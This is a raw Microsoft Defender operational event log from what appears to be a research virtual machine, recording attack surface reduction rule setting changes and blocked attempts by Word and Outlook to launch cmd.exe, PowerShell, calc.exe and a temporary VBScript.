Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x2
11/16/2023 04:22:28 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1821
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x2
11/16/2023 04:22:28 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1820
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x2
11/16/2023 04:22:28 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1819
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x2
11/16/2023 04:22:28 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1818
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x2
11/16/2023 04:22:28 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1817
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x2
11/16/2023 04:22:28 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1816
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x2
11/16/2023 04:22:28 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1815
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x2
11/16/2023 04:22:28 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1814
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x2
11/16/2023 04:22:28 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1813
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x2
11/16/2023 04:22:28 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1812
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x2
11/16/2023 03:51:28 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=1811
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: 3B576869-A4EC-4529-8536-B80A7769E899
Detection time: 2023-11-16T15:51:28.553Z
User: researchvmhaa\research
Path: C:\Users\research\AppData\Local\Temp\script.vbs
Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
Target Commandline:
Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.696.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/16/2023 03:49:14 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=1810
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A
Detection time: 2023-11-16T15:49:14.419Z
User: researchvmhaa\research
Path: C:\Windows\System32\cmd.exe
Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
Target Commandline: cmd.exe
Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.696.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/16/2023 03:48:55 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=1809
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A
Detection time: 2023-11-16T15:48:55.840Z
User: researchvmhaa\research
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
Target Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.696.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/16/2023 03:48:43 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=1808
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A
Detection time: 2023-11-16T15:48:43.137Z
User: researchvmhaa\research
Path: C:\Windows\System32\cmd.exe
Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
Target Commandline: "C:\Windows\System32\cmd.exe"
Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.696.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/16/2023 03:48:05 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=1807
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: 26190899-1602-49E8-8B27-EB1D0A1CE869
Detection time: 2023-11-16T15:48:05.496Z
User: researchvmhaa\research
Path: C:\Windows\System32\cmd.exe
Process Name: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE
Target Commandline: "C:\Windows\System32\cmd.exe"
Parent Commandline: "C:\Program Files\Microsoft Office\Root\Office16\OUTLOOK.EXE" -Embedding
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.696.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/16/2023 03:47:26 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=1806
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: 26190899-1602-49E8-8B27-EB1D0A1CE869
Detection time: 2023-11-16T15:47:26.565Z
User: researchvmhaa\research
Path: C:\Windows\System32\calc.exe
Process Name: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE
Target Commandline: "C:\Windows\System32\calc.exe"
Parent Commandline: "C:\Program Files\Microsoft Office\Root\Office16\OUTLOOK.EXE" -Embedding
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.696.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/16/2023 03:46:44 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=1805
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A
Detection time: 2023-11-16T15:46:44.558Z
User: researchvmhaa\research
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
Target Commandline: powershell.exe
Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.696.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/16/2023 03:29:16 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=1804
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: 9E6C4E1F-7D60-472F-BA1A-A39EF669E4B2
Detection time: 2023-11-16T15:29:16.906Z
User: NT AUTHORITY\SYSTEM
Path: C:\WindowsAzure\Packages\WaAppAgent.exe
Process Name: C:\Windows\System32\lsass.exe
Target Commandline:
Parent Commandline:
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.696.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/16/2023 03:29:07 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1803
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\ServiceStartStates = 0x1
New value: Default\ServiceStartStates = 0x0
11/16/2023 03:29:03 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1802
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\ServiceStartStates = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\ServiceStartStates = 0x1
11/16/2023 03:28:51 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1801
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\IsServiceRunning = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\IsServiceRunning = 0x1
11/16/2023 02:57:57 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=1800
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A
Detection time: 2023-11-16T14:57:57.040Z
User: researchvmhaa\research
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
Target Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.696.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/16/2023 12:54:53 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1744
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\48 = 0x1
11/16/2023 12:44:53 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=1741
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: 9E6C4E1F-7D60-472F-BA1A-A39EF669E4B2
Detection time: 2023-11-16T12:44:53.365Z
User: NT AUTHORITY\SYSTEM
Path: C:\WindowsAzure\Packages\WaAppAgent.exe
Process Name: C:\Windows\System32\lsass.exe
Target Commandline:
Parent Commandline:
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.693.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/16/2023 12:44:37 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1740
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\ServiceStartStates = 0x1
New value: Default\ServiceStartStates = 0x0
11/16/2023 12:44:33 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1739
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\ServiceStartStates = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\ServiceStartStates = 0x1
11/16/2023 12:44:22 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1738
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\IsServiceRunning = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\IsServiceRunning = 0x1
11/16/2023 03:33:56 AM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1632
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\48 = 0x1
New value:
11/16/2023 01:50:39 AM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1609
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\48 = 0x1
11/15/2023 07:23:27 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1576
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\ProductAppDataPath = C:\ProgramData\Microsoft\Windows Defender
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\ProductAppDataPath = C:\ProgramData\Microsoft\Windows Defender
11/15/2023 01:50:39 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1492
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\48 = 0x1
New value:
11/15/2023 09:50:24 AM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1474
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\Signature Updates\ISUControlFlags = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates\ISUControlFlags = 0x1
11/15/2023 09:50:24 AM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1473
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\Signature Updates\ISUInterval = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates\ISUInterval = 0x4
11/15/2023 09:50:24 AM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1472
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\Signature Updates\ISUReason = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates\ISUReason = 0x10
11/15/2023 09:50:24 AM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1471
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\Signature Updates\ISULength = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates\ISULength = 0x18
11/15/2023 09:49:29 AM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1321
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\48 = 0x1
11/15/2023 03:24:34 AM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=1306
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: 9E6C4E1F-7D60-472F-BA1A-A39EF669E4B2
Detection time: 2023-11-15T03:24:34.279Z
User: NT AUTHORITY\SYSTEM
Path: C:\WindowsAzure\Packages\WaAppAgent.exe
Process Name: C:\Windows\System32\lsass.exe
Target Commandline:
Parent Commandline:
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.622.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/15/2023 03:23:41 AM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1305
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\ServiceStartStates = 0x1
New value: Default\ServiceStartStates = 0x0
11/15/2023 03:23:33 AM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1304
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\ServiceStartStates = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\ServiceStartStates = 0x1
11/15/2023 03:23:23 AM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1303
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\IsServiceRunning = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\IsServiceRunning = 0x1
11/14/2023 11:12:42 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=1294
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: 9E6C4E1F-7D60-472F-BA1A-A39EF669E4B2
Detection time: 2023-11-14T23:12:42.900Z
User: NT AUTHORITY\SYSTEM
Path: C:\WindowsAzure\Packages\WaAppAgent.exe
Process Name: C:\Windows\System32\lsass.exe
Target Commandline: C:\WindowsAzure\Packages\WaAppAgent.exe
Parent Commandline:
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.622.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/14/2023 10:52:44 PM
LogName=Microsoft-Windows-Windows Defender/Operational
